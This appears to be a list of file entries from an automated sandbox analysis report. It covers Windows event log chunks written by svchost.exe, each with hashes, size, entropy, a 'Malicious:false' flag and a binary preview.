                            SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                            MD5:A00BAFFCABB00428EA0512FCECCC55E5
                            SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                            SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                            SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.0646587531847893
                            Encrypted:false
                            SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                            MD5:399CAF70AC6E1E0C918905B719A0B3DD
                            SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                            SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                            SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.4364303862010575
                            Encrypted:false
                            SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                            MD5:2BB73ACC8F7419459C4BF931AB85352C
                            SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                            SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                            SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                            Malicious:false
                            Preview:ElfChnk (binary Windows event log chunk; readable strings: Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event", System, Provider, Name, Guid, EventID, Qualifiers, Version; raw dump omitted)
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.0631557320109892
                            Encrypted:false
                            SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                            MD5:86AEA3A9CA3E5909FD44812754E52BD6
                            SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                            SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                            SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                            Malicious:false
                            Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.4467272005363894
                            Encrypted:false
                            SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                            MD5:155681C222D825199B738E8DEC707DC8
                            SHA1:704C800E7313F77A218203554E1428DF2819BC34
                            SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                            SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                            Malicious:false
                            Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.156155224835584
                            Encrypted:false
                            SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                            MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                            SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                            SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                            SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                            Malicious:false
                            Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.9197999988543422
                            Encrypted:false
                            SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                            MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                            SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                            SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                            SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                            Malicious:false
                            Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                            Category:dropped
                            Size (bytes):76040
                            Entropy (8bit):4.551685398568497
                            Encrypted:false
                            SSDEEP:768:JLjpPv++M48PFVbUa+52j6LjpPv++M48PFVbUa+52jyY20sMY3Dp13/n/ydIxm6c:bU
                            MD5:D7FAC000E8F833A09029633F2D80D4F8
                            SHA1:54CAA6333B82E5D3FAB81C8614C971A0258C288D
                            SHA-256:E8A82460CEE168F5FDB02EA5C31E287F42BD9B165DB485F52E4D8CB55FFF16DA
                            SHA-512:03FCECA6B97282BA2D1BFEA3A494AE0E0EA0F1504B322BF931EACC1A3DB4FD7CAA3381EA1B257988DF88C3839D1F2E9D9363897A1CC7D5F8C97053833C74D2D6
                            Malicious:false
                            Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...il.....................................................................k...................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):75880
                            Entropy (8bit):5.700069043094079
                            Encrypted:false
                            SSDEEP:384:Bhka5a29o2KLzyzIz7a5QzuzNz0zxzuewKWMKYa5i0hka5a29o2KLzyzIz7a5Qze:BHk0HkAtWpSFNWuV6PfS7c
                            MD5:16CCF2E39D0F94601315CA4B84A958FA
                            SHA1:1EAB2C9C5BB4B15DAA500F9DCF120C0447C10287
                            SHA-256:BC75B1048966FEDFCBF30DB7715B195B22FE7478D53F9AB1747302C37D2DC891
                            SHA-512:41DC46939F1A741B2A9C4E3D14146165255ED7C4BCC030837B7B75A1B4C78B75A6BEF5D84DA49847B2921C4A1475EB025A098C0FA9FCB3347086D969A7E51425
                            Malicious:false
                            Preview:ElfChnk.A.......C.......A.......C............$..h(...v=........................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................%..........**......A...........1.............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9963080376858662
                            Encrypted:false
                            SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                            MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                            SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                            SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                            SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                            Malicious:false
                            Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.076996627399968
                            Encrypted:false
                            SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                            MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                            SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                            SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                            SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                            Malicious:false
                            Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.224121476511546
                            Encrypted:false
                            SSDEEP:384:ihhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGj:ihZxGp9b1
                            MD5:9B3B244C997316E5AAF45EE5357F8CB9
                            SHA1:7D7096D753E558A7A78A1BF2C48595AA6FEA4411
                            SHA-256:65242DABB1E89A773F64009609067D8EE68DD749EF4DAB2CDFC69381A588429D
                            SHA-512:C66504634D10769BADED620519A481FE86D08C75EB172967111DD0D0AB71D19DD01381FA6A0CCC0A12F57E77CACA0C3B06150DB765A8F5C38E069C0FF6747640
                            Malicious:false
                            Preview:ElfChnk.T...............T...................P...h....N.U....................................................................Q...........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.801423310886069
                            Encrypted:false
                            SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                            MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                            SHA1:542608204AF6B709B06807E9466F7543C0F08818
                            SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                            SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                            Malicious:false
                            Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.996272372482282
                            Encrypted:false
                            SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                            MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                            SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                            SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                            SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                            Malicious:false
                            Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):224288
                            Entropy (8bit):4.0578208166728915
                            Encrypted:false
                            SSDEEP:6144:KgfRTFgfRqggfRTFgfRq5gfR+EgfRXbgfR6QgfRTFgfRqR:H
                            MD5:DCAEFB4CFE6B5597E2695AE712E2F52C
                            SHA1:DA2755B33D3C77DB2079940CC731FFE2A4786DB5
                            SHA-256:1456AC5A3205834F62C107952CC079610EEF4188C02C66AE2ED9807B09321EEF
                            SHA-512:ADE8BEC992D50812CA2C3570A416AAA2B37E7B7A7F621054A3C1A837DE3650FE714C07BDEA6E76572BAD85197F70361F37B35E0DA490B6552C0715315A20A41E
                            Malicious:false
                            Preview:ElfChnk......................................i.. l..T.......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................aj..............................................................................&...................................**.. 6..............1.............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.743586753696042
                            Encrypted:false
                            SSDEEP:768:GkN2cTOsKfIPHa4SAdRNlfhvd7NrjzDbRt:OcisgIPQAdRNlfhvd53R
                            MD5:977AF26CE27A3396A72725FBF098FB2F
                            SHA1:D6BCC1A9773B4A28E04298A757BE89325A07817E
                            SHA-256:373BFFB927967A5A8C5B30F9CAD4707946971F64C431877D0101572E7DFD692A
                            SHA-512:72A55A5A41072F32D7FC273FCD2E948949F834E17345F6964BF84963C1B1E6174003E5C52A5D49857701DB62AA9A6B8C617C4C14FB12F38D4880C40213BF20DB
                            Malicious:false
                            Preview:ElfChnk.........................................p............................................................................r..................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.7590316238843728
                            Encrypted:false
                            SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                            MD5:B074238315662886E2BD70106D08A747
                            SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                            SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                            SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                            Malicious:false
                            Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.7511849914008617
                            Encrypted:false
                            SSDEEP:1536:qXhPUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:qX5nS
                            MD5:7C35AE7799444BA51305F08470819182
                            SHA1:69F7281E876D4DDF12172D988F6A689E7B43CE79
                            SHA-256:24FC5B64AD7AACD89BD3111C8402AD478229733A1DC5238ABDA6002590904FC1
                            SHA-512:6725720CE21C9023BF6EF3CDC390095388EF33EE2973FE61DCC934B91750693191F3B680DED871CB38CB27B345F5C38F69FD667E270FD3011C35ADA07F3CB780
                            Malicious:false
                            Preview:ElfChnk.........%...............%............E..`G...X.S....................................................................B.!.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.3069197485541766
                            Encrypted:false
                            SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                            MD5:E6E4C860CE7DD1BB499D6A082B461B90
                            SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                            SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                            SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                            Malicious:false
                            Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:modified
                            Size (bytes):127536
                            Entropy (8bit):4.001162306513506
                            Encrypted:false
                            SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqDh0w+qLpBVi7CPME79nCxkSqc5:c0w+qtBViW0w+qtBViD5
                            MD5:188278CD4E5CCB184C0D5C5F8AE14E5A
                            SHA1:06549039C676007C26084A2D86C9460F201A1DD6
                            SHA-256:0A93B55EEFDE1A64F92514B5F7FC43B8393E8009633C1E6F5D08FAE20FEB9035
                            SHA-512:99E813233D5753BDE4F01892146763060E6107D6EC9585FA655855825800A3C7A10B0DD21A24DBE8F18D2CC234CD72D3207B73842286B970FF1B4BEC88E129CE
                            Malicious:false
                            Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.2909571978750325
                            Encrypted:false
                            SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                            MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                            SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                            SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                            SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                            Malicious:false
                            Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.488768580471203
                            Encrypted:false
                            SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                            MD5:E3FB1708C64D250E4D801AFB8688DF35
                            SHA1:8B889F0358683733257411E451A86E3A1D42159D
                            SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                            SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                            Malicious:false
